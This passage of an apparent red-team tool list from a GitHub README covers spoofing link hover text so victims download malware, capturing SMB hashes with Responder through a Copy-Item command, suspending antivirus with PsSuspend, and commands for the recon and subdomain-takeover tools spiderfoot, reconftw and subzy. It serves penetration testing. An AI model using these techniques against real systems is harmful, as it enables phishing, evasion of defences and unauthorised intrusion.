victims into clicking spoofed in-page malware download links. 
Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link \u003ccode\u003egoogle.com\u003c/code\u003e, but once clicked the victim will be redirected to your malicious link \u003ccode\u003ebing.com\u003c/code\u003e. Great for getting victims to download payloads via a controlled site.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault\" rel=\"nofollow\"\u003ePreventDefault Docs\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCheck SMB firewall rules with Responder\u003c/h3\u003e\u003ca id=\"user-content-check-smb-firewall-rules-with-responder\" class=\"anchor\" aria-label=\"Permalink: 🔙Check SMB firewall rules with Responder\" href=\"#check-smb-firewall-rules-with-responder\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png\"\u003e\u003cimg 
src=\"https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-powershell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Copy-Item -Path \u0026quot;C:\\tmp\\\u0026quot; -Destination \u0026quot;\\\\\u0026lt;ip_running_responder\u0026gt;\\c$\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003eCopy-Item\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-\u003c/span\u003ePath \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\tmp\\\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e-\u003c/span\u003eDestination \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\\\\\u0026lt;ip_running_responder\u0026gt;\\c$\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: \u003ccode\u003eCopy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u0026lt;ip_running_responder\u0026gt;\\c$\"\u003c/code\u003e. 
If Responder could capture the hash, the firewall allows outgoing SMB connections'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/malmoeb\" rel=\"nofollow\"\u003e@malmoeb\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/malmoeb/status/1628272928855826433\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eDisable AV with SysInternals PsSuspend\u003c/h3\u003e\u003ca id=\"user-content-disable-av-with-sysinternals-pssuspend\" class=\"anchor\" aria-label=\"Permalink: 🔙Disable AV with SysInternals PsSuspend\" href=\"#disable-av-with-sysinternals-pssuspend\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" 
href=\"https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003eUsing the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. 
The Microsoft-signed tool can be passed the PID or name of a running service; it suspends the process via the NtSuspendProcess Windows API.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eRelated Blog Post:\u003c/strong\u003e \u003ca href=\"https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7\" rel=\"nofollow\"\u003eBypassing AV via Process Suspension with PsSuspend.exe\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/0gtweet/status/1638069413717975046\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eReconnaissance\u003c/h1\u003e\u003ca id=\"user-content-reconnaissance\" class=\"anchor\" aria-label=\"Permalink: Reconnaissance\" href=\"#reconnaissance\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/smicallef/spiderfoot\"\u003espiderfoot\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-spiderfoot\" 
class=\"anchor\" aria-label=\"Permalink: 🔙spiderfoot\" href=\"#spiderfoot\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSpiderFoot can be used offensively (e.g. 
in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz\ntar zxvf v4.0.tar.gz\ncd spiderfoot-4.0\npip3 install -r requirements.txt\"\u003e\u003cpre\u003ewget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz\ntar zxvf v4.0.tar.gz\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e spiderfoot-4.0\npip3 install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 ./sf.py -l 127.0.0.1:5001\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e .\u003cspan class=\"pl-c1\"\u003e/\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003esf\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003epy\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003el\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e127.0\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003e.0\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003e1\u003c/span\u003e:\u003cspan class=\"pl-c1\"\u003e5001\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLots of usage tutorial videos \u003ca href=\"https://asciinema.org/~spiderfoot\" 
rel=\"nofollow\"\u003ehere\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY\" alt=\"spiderfoot\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca 
href=\"https://github.com/smicallef/spiderfoot\"\u003ehttps://github.com/smicallef/spiderfoot\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/six2dez/reconftw\"\u003ereconftw\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-reconftw\" class=\"anchor\" aria-label=\"Permalink: 🔙reconftw\" href=\"#reconftw\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ereconFTW automates the entire process of reconnaissance for you. 
It performs subdomain enumeration along with various vulnerability checks, gathering as much information as possible about your target.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh\"\u003e\u003cpre\u003egit clone https://github.com/six2dez/reconftw.git\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e reconftw/\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e./install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Single target domain\n./reconftw.sh -d target.com -r\n\n# One target with multiple domains\n./reconftw.sh -m target -l domains.txt -r\n\n# Passive recon\n./reconftw.sh -d target.com -p\n\n# Perform all checks and exploitations\n./reconftw.sh -d target.com -a\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Single target domain\u003c/span\u003e\n./reconftw.sh -d target.com -r\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e One target with multiple domains\u003c/span\u003e\n./reconftw.sh -m target -l domains.txt -r\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Passive recon\u003c/span\u003e\n./reconftw.sh -d target.com -p\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan 
class=\"pl-c\"\u003e#\u003c/span\u003e Perform all checks and exploitations\u003c/span\u003e\n./reconftw.sh -d target.com -a\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full usage instructions see \u003ca href=\"https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs\"\u003e\u003cimg 
src=\"https://private-user-images.githubusercontent.com/100603074/423172569-1a5abeb5-776d-4c10-a02c-934e1662d817.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTY5LTFhNWFiZWI1LTc3NmQtNGMxMC1hMDJjLTkzNGUxNjYyZDgxNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yYTNkOTk4ZTU1YjJkM2I2MGRmMWY0OTg1MWJjNWIwYjA4ZjlhNTEzNGMyMWRiOWQ4ODY0YzBiYTliNmJmMTQzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.4VrrzJO2w1Or-9V-RL7WLZIlGqLSIYBairYajUJmacs\" alt=\"reconftw\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.youtube.com/watch?v=TQmDAtkD1Wo\" rel=\"nofollow\"\u003ehttps://www.youtube.com/watch?v=TQmDAtkD1Wo\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/PentestPad/subzy\"\u003esubzy\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-subzy\" class=\"anchor\" aria-label=\"Permalink: 🔙subzy\" href=\"#subzy\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSubdomain takeover tool which works based on matching response fingerprints from \u003ca href=\"https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md\"\u003ecan-i-take-over-xyz\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go install -v github.com/PentestPad/subzy@latest\"\u003e\u003cpre\u003ego install -v github.com/PentestPad/subzy@latest\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full installation instructions see \u003ca href=\"https://github.com/PentestPad/subzy?tab=readme-ov-file#installation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# List of subdomains\n./subzy run --targets list.txt\n\n# Single or multiple targets\n./subzy run --target test.google.com\n./subzy run --target test.google.com,https://test.yahoo.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List of subdomains\u003c/span\u003e\n./subzy run --targets list.txt\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Single or multiple targets\u003c/span\u003e\n./subzy run --target test.google.com\n./subzy run --target test.google.com,https://test.yahoo.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" 
